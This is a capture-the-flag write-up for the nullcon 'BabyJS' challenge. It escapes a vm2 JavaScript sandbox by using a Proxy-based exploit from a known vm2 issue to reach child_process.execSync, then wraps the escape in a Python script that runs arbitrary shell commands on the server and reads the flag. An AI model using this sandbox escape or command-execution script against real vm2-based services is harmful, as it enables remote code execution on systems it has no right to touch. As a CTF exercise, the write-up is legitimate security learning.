# BabyJS

> Run your javascript code inside this page and preview it because of hackers we have only limited functions
>
> http://web4.ctf.nullcon.net:8080/ mirror : http://web5.ctf.nullcon.net:8080/

We are given a web page, where we can send JavaScript code to be executed in a sandbox on the server side. We need to escape this sandbox.  
First of all, let's trigger stack trace to be printed to see what kind of sandbox is there:
```js
new Error().stack
```
```
Error
    at vm.js:1:1
    at ContextifyScript.Script.runInContext (vm.js:59:29)
    at VM.run (/usr/src/app/node_modules/vm2/lib/main.js:208:72)
    at /usr/src/app/server.js:21:20
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at next (/usr/src/app/node_modules/express/lib/router/route.js:137:13)
    at Route.dispatch (/usr/src/app/node_modules/express/lib/router/route.js:112:3)
    at Layer.handle [as handle_request] (/usr/src/app/node_modules/express/lib/router/layer.js:95:5)
    at /usr/src/app/node_modules/express/lib/router/index.js:281:22
    at Function.process_params (/usr/src/app/node_modules/express/lib/router/index.js:335:12)
```
The sandbox is VM2. VM2 code is hosted on github (https://github.com/patriksimek/vm2). Several sandbox escape bugs have been fixed recently. Let's check the last one (https://github.com/patriksimek/vm2/issues/186) and hope that the VM2 hasn't been upgraded to the newest version on our server:
```js
var process;
try{
Object.defineProperty(Buffer.from(""),"",{
	value:new Proxy({},{
		getPrototypeOf(target){
			if(this.t)
				throw Buffer.from;
			this.t=true;
			return Object.getPrototypeOf(target);
		}
	})
});
}catch(e){
	process = e.constructor("return process")();
}
process.mainModule.require("child_process").execSync("whoami").toString()
```
Bingo! It worked. The following script executes the provided command on the server and prints its output:
```python
import requests
import sys
 
address = "http://web4.ctf.nullcon.net:8080/run?js="
payload = "var%20process;try{Object.defineProperty(Buffer.from(%22%22),%22%22,{value:new%20Proxy({},{getPrototypeOf(target){if(this.t)throw%20Buffer.from;this.t=true;return%20Object.getPrototypeOf(target);      }})});}catch(e){process%20=%20e.constructor(%22return%20process%22)();}process.mainModule.require(%22child_process%22).execSync(%22{command}%22).toString()"
 
r = requests.get(address + payload.replace('{command}', sys.argv[1]))
print(r.text)
```
Now let's execute `ls`:
```
$ ./rce.py ls
Dockerfile
docker-compose.yml
iamnotwhatyouthink
index.html
node_modules
package-lock.json
package.json
server.js
start.sh
```
`iamnotwhatyouthink` file looks interesting:
```
$ ./rce.py 'cat iamnotwhatyouthink'
hackim19{S@ndbox_0_h4cker_1}
```
The flag is `hackim19{S@ndbox_0_h4cker_1}`.